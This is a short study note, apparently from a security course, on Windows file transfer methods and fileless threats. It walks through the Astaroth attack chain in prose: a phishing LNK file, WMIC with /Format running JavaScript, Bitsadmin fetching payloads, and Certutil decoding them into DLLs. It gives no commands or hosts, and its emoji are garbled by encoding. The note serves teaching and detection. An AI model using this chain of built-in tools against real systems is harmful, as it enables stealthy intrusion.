πΎ Windows File Transfer Methods: Intro & APT Example
The Windows OS keeps changing β and so do the ways files can be transferred π
These methods can be used by attackers to avoid detection AND defenders to catch them!
π§ Key Learning: Fileless Threats
π¦ Fileless threats = No obvious file stored on disk
Instead, attackers use built-in Windows tools to carry out attacks in memory (sneaky!).
π΅οΈββοΈ The Astaroth Attack β Step by Step
The Microsoft Astaroth Attack is used here as an example of an APT (Advanced Persistent Threat).
It followed these steps:
π£ Phishing Email β victim clicks on an LNK file
π οΈ This triggers the WMIC tool with the /Format flag
π This executes JavaScript code
π JavaScript abuses the Bitsadmin tool to download more payloads
π Payloads are Base64-encoded and decoded using Certutil β DLL files